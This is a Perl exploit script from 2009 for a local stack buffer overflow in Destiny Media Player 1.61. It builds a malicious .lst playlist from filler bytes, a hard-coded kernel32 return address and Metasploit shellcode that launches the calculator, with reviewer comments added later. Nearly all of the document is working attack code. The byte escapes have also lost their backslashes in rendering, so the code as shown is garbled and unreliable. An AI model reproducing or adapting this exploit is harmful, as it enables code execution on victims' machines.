
# Title : Destiny Media Player 1.61 (lst File) Local Buffer Overflow Exploit #3
# Published : 2009-01-04
# Author : Houssamix


#!/usr/bin/perl -w

# exploit coded by Houssamix
# poc found by aBo MoHaMeD 


# Banner: author and target title framed by separator lines. The strings
# are reproduced exactly as they appear on the page.
my $rule = "===================================================================== n";
print $rule,
      "Author : Houssamix  n",
      $rule,
      "Destiny Media Player 1.61 (.lst File) Local Stack Overflow Exploit n",
      "===================================================================== nn";


# Assemble the contents of the .lst file as one string: filler, a 4-byte
# value the author labels as a return address, a one-unit pad, then the
# payload.
#
# NOTE(review): as rendered on this page the string literals carry no
# backslashes (compare the " n" endings of the banner strings), so what is
# shown is plain text such as "x41" rather than byte escapes. Presumably an
# extraction artifact -- treat every length and offset below as unverified.

# Filler: the literal is repeated 2052 times with the x operator.
my $overflow = "x41" x 2052;

# Hard-coded address inside kernel32.dll (per the author's comment). It is
# only meaningful where that exact module build loads at that address;
# presumably ASLR or a different OS/service-pack level invalidates it --
# TODO confirm which Windows build the author tested on.
my $ret = "x5Dx38x82x7C"; #call ESP from kernel32.dll       0x7C82385D

# Single pad unit placed between the address and the payload.
my $nop = "x90" x 1;

# Author's note: Metasploit-generated win32_exec payload with CMD=calc,
# i.e. the demonstration launches the calculator. Running a payload from the
# stack is the behaviour DEP/NX is designed to block.
# win32_exec -  EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com
my $shellcode =
"x31xc9x83xe9xdexd9xeexd9x74x24xf4x5bx81x73x13x08".
"x99x23x82x83xebxfcxe2xf4xf4x71x67x82x08x99xa8xc7".
"x34x12x5fx87x70x98xccx09x47x81xa8xddx28x98xc8xcb".
"x83xadxa8x83xe6xa8xe3x1bxa4x1dxe3xf6x0fx58xe9x8f".
"x09x5bxc8x76x33xcdx07x86x7dx7cxa8xddx2cx98xc8xe4".
"x83x95x68x09x57x85x22x69x83x85xa8x83xe3x10x7fxa6".
"x0cx5ax12x42x6cx12x63xb2x8dx59x5bx8ex83xd9x2fx09".
"x78x85x8ex09x60x91xc8x8bx83x19x93x82x08x99xa8xea".
"x34xc6x12x74x68xcfxaax7ax8bx59x58xd2x60x69xa9x86".
"x57xf1xbbx7cx82x97x74x7dxefxfax42xeex6bx99x23x82";


# Output file name; relative, so it is created in the current working
# directory.
my $file="hsmx.lst";

# Concatenation order is filler, address, pad, payload.
# No `my` here: $exploit is a package global, which is accepted only because
# the script does not enable `use strict`.
# Defensive note: a playlist file holding more than 2 KB in one unbroken run
# is presumably anomalous for this format and usable as a detection signal --
# verify against the player's real .lst layout.
$exploit = $overflow.$ret.$nop.$shellcode;

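# Write the assembled string to $file and report completion.
# Three-argument open keeps the mode separate from the file name, so
# characters in the name can never change how the file is opened.
# '>>' is kept from the original: the file is appended to, so re-running the
# script grows an existing file instead of replacing it.
open(my $FILE, '>>', $file) or die "Cannot open $file: $!";
print {$FILE} $exploit or die "Cannot write $file: $!";
# Buffered write errors only surface at close, so the result is checked.
close($FILE) or die "Cannot close $file: $!";
print "$file has been created n";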

# www.Syue.com [2009-01-04]